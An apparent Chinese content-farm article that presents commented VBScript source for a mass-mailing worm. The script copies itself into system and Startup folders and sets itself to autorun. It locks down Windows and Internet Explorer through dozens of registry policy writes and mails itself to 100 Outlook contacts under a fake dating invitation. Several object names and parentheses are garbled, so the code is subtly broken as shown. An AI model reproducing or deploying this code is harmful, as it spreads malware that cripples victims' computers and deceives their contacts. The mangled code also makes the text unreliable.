電腦病毒源代碼介紹

　　電腦中了病毒想從它的源代碼入手怎么辦呢!有學(xué)習(xí)啦小編在，下面由學(xué)習(xí)啦小編給你做出詳細(xì)的電腦病毒源代碼介紹!希望對你有幫助!

　　電腦病毒源代碼介紹：

　　電腦病毒源代碼一：

　　on error resume next

　　set fs=createobject("ing.filesystemobject" '創(chuàng)建一個(gè)能與操作系統(tǒng)溝通的對象,再利用該對象的各種方法對注冊表進(jìn)行操作

　　set dir1=fs.getspecialfolder(0) '獲取windows/winnt文件夾位置

　　set dir2=fs.getspecialfolder(1) '獲取system32/system文件夾位置

　　set so=createobject("ing.filesystemobject"

　　dim r '定義一個(gè)變量

　　set r=createobject("w.shell"

　　so.getfile(w.fullname).copy(dir1&"\win32system.vbs" '復(fù)制病毒副本到windows/winnt文件夾位置

　　so.getfile(w.fullname).copy(dir2&"\win32system.vbs" '復(fù)制病毒副本到system32/system文件夾位置

　　so.getfile(w.fullname).copy(dir1&"\start menu\programs\啟動(dòng)\win32system.vbs" '復(fù)制病毒副本到start menu啟動(dòng)菜單

　　'下面是對注冊表的惡意修改和簡單的依靠oe傳播

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注冊表，禁止“運(yùn)行”菜單

　　r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注冊表，禁止“關(guān)閉”菜單

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注冊表，隱藏所有邏輯盤符

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注冊表，禁止注冊表編輯

　　r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注冊表，禁止開機(jī)注冊表掃描

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注冊表，禁止“注銷”菜單

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注冊表，禁止ms-dos實(shí)模式

　　r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注冊表，使這個(gè)腳本本身開機(jī)自動(dòng)運(yùn)行

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注冊表，禁止顯示桌面圖標(biāo)

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注冊表，禁止純dos模式

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注冊表，禁止“任務(wù)欄和開始”菜單

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注冊表，禁止右鍵菜單

　　電腦病毒源代碼二：

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword" '修改注冊表，禁止控制面板

　　r.regwrite "hklm\software\classes\.reg\","txtfile" '修改注冊表，禁止導(dǎo)入使用.reg文件，改為用txt文件的關(guān)聯(lián)

　　r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告" '設(shè)置開機(jī)提示框標(biāo)題

　　r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs腳本病毒了，哭吧~" '設(shè)置開機(jī)提示框文本內(nèi)容

　　set ol=createobject("outlook.application" '創(chuàng)建outlook文件對象用于傳播

　　on error resume next

　　for x=1 to 100

　　set mail=ol.createitem(0)

　　mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名發(fā)送此 vbs病毒，可以算是簡單弱智的蠕蟲了吧~~

　　mail.subject="今晚你來嗎?" '郵件主題

　　mail.body="朋友你好：您的朋友rose給您發(fā)來了熱情的邀請。具體情況請閱讀隨信附件，祝您好運(yùn)! 同城約會網(wǎng)" '郵件內(nèi)容

　　mail.attachments.add(dir2&"win32system.vbs"

　　mail.send

　　next

　　ol.quit

　　'下面是對internet explore 選項(xiàng)的惡意修改

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword" '修改注冊表，禁止鼠標(biāo)右鍵

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword" '修改注冊表，禁止internet選項(xiàng)

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword" '修改注冊表，禁止“另存為”

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword" '修改注冊表，禁止“文件/打開”菜單

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword" '修改注冊表，禁止更改高級頁設(shè)置

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword" '修改注冊表，禁止更改臨時(shí)文件設(shè)置

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword" '修改注冊表，禁止更改自動(dòng)配置

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword" '修改注冊表，禁止更改主頁，即“主頁”變灰

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword" '修改注冊表，禁止更改歷史記錄設(shè)置

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword" '修改注冊表，禁止更改internet連接向?qū)?/p>

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword" '修改注冊表，禁止更改安全項(xiàng)

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword" '修改注冊表，禁止“重置web設(shè)置”

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword" '修改注冊表，禁止查看源文件

　　r.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubions",1,"reg_dword" '修改注冊表，禁止添加脫機(jī)計(jì)劃

　　r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nofilemenu",1,"reg_dword" '修改注冊表，禁止“文件”菜單
看了“電腦病毒源代碼介紹”文章的還看了：

1.電腦病毒源代碼詳細(xì)介紹

2.電腦病毒機(jī)器狗的源代碼

3.電腦病毒檢測方法介紹

4.編寫電腦病毒代碼